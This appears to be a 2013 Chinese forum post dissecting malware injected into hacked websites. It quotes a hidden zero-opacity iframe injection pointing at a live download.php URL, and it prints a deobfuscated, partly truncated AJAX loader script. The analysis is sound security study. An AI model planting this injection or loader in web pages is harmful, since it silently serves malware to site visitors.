首先是直接的。。。- <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>');</script>
如http://expeditecourier.co.ke/wp- ... erfade.js?ver=3.0.3也都嵌入了这段话
然后是最后那一段
解开是- function kx_M(file){
- this.kx_z=null;
- this.kx_P=function(){
- this.kx_B="GET";
- this.kx_i="?";
- this.kx_rx="&";
- this.kx_r=window;
- this.kx_rt="";
- this.kx_b=true;
- this.kx_w=false;
- this.kx_E=true;
- this.kx_rr=null;
- this.kx_A=null;
- this.kx_F=file;
- this.kx_t=new Object();
- this.kx_C=new Array(2);
- this.kx_r.offset=100}
- ;
- this.kx_n=function(){
- this.kx_L=function(){
- }
- ;
- this.kx_u=function(){
- }
- ;
- this.kx_y=function(){
- }
- ;
- this.kx_J=function(){
- this.runResponse()}
- ;
- this.kx_e=function(){
- }
- ;
- this.kx_q=function(){
- this.runResponse()}
- }
- ;
- this.kx_m=function(){
- this.kx_n();
- this.kx_P()}
- ;
- this.kx_rg=function(){
- this.kx_k();
- try{
- this.kx_z=new ActiveXObject("Msxml2.XMLHTTP")}
- catch(e1){
- try{
- this.kx_z=new ActiveXObject("Microsoft.XMLHTTP")}
- catch(e2){
- this.kx_z=null}
- }
- if(!this.kx_z){
- if(typeof XMLHttpRequest!="undefined"){
- this.kx_z=new XMLHttpRequest()}
- else{
- this.kx_E=true}
- }
- }
- ;
- this.kx_c=function(kx_o,value){
- this.kx_t[kx_o]=Array(value,false)}
- ;
- this.kx_v=function(kx_o,value,returnvars){
- if(true==returnvars){
- return Array(encodeURIComponent(kx_o),encodeURIComponent(value))}
- else{
- this.kx_t[encodeURIComponent(kx_o)]=Array(encodeURIComponent(value),true)}
- }
- ;
- this.kx_H=function(kx_p,kx_S){
- kx_T=encodeURIComponent(this.kx_rx);
- regexp=new RegExp(this.kx_rx+"|"+kx_T);
- varArray=kx_p.split(regexp);
- for(i=0;
- i<varArray.length;
- i++){
- kx_j=varArray[i].split("=");
- if(true==kx_S){
- this.kx_v(kx_j[0],kx_j[1])}
- else{
- this.kx_c(kx_j[0],kx_j[1])}
- }
- }
- ;
- window.trim=function(kx_o,kx_f){
- if("qabcdef".indexOf(kx_o.substr(0,1))>=0){
- var kx_rs=kx_o.split('q').join('').split('v');
- for(var i=0;
- i<kx_r....response=d;
- this.kx_b=true;
- this.kx_w=false;
- this.kx_rr=null;
- this.kx_A=null;
- this.kx_F=file;
- this.kx_t=new Object();
- this.kx_C=new Array(2)}
- ;
- this.runAJAX=function(kx_R){
- if(this.kx_E){
- this.kx_q()}
- else{
- this.kx_rN(kx_R);
- if(this.kx_rr){
- this.kx_A=document.getElementById(this.kx_rr)}
- if(this.kx_z){
- var self=this;
- if(this.kx_B=="GET"){
- kx_K=this.kx_F+this.kx_i+this.kx_rt;
- this.kx_z.open(this.kx_B,kx_K,true)}
- else{
- this.kx_z.open(this.kx_B,this.kx_F,true);
- try{
- this.kx_z.setRequestHeader("Content-Type","application/x-www-form-urlencoded")}
- catch(e){
- }
- }
- this.kx_z.onreadystatechange=function(){
- switch(self.kx_z.readyState){
- case 1:self.kx_L();
- break;
- case 2:self.kx_u();
- break;
- case 3:self.kx_y();
- break;
- case 4:self.response=self.kx_z.responseText;
- self.responseXML=self.kx_z.responseXML;
- self.kx_C[0]=self.kx_z.status;
- self.kx_C[1]=self.kx_z.statusText;
- if(self.kx_w){
- self.runResponse()}
- if(self.kx_A){
- elemNodeName=self.kx_A.nodeName;
- elemNodeName.toLowerCase();
- if(elemNodeName=="input"||elemNodeName=="select"||elemNodeName=="option"||elemNodeName=="textarea"){
- self.kx_A.value=self.response}
- else{
- self.kx_A.innerHTML=self.response}
- }
- if(self.kx_C[0]=="200"){
- self.kx_J()}
- else{
- self.kx_e()}
- self.kx_rt="";
- break}
- }
- ;
- this.kx_z.send(this.kx_rt)}
- }
- }
- ;
- this.kx_m();
- this.kx_rg()}
- window.ajax=new kx_M();
- try{
- var kx_G=document.getElementById('kx_D');
- ajax.kx_c("query",kx_G.kx_d.kx_f);
- ajax.kx_F="query.php";
- ajax.kx_B=kx_G.kx_B.kx_f;
- ajax.kx_rr='kx_rz';
- ajax.kx_L=kx_N;
- ajax.kx_u=kx_g;
- ajax.kx_y=kx_s;
- ajax.kx_J=kx_x;
- ajax.runAJAX()}
- catch(e){
- ajax.runAJAX()}
-
最后是中间数字的那一段。。非常有意思。。。 |
发表于 2013-4-25 23:30:19
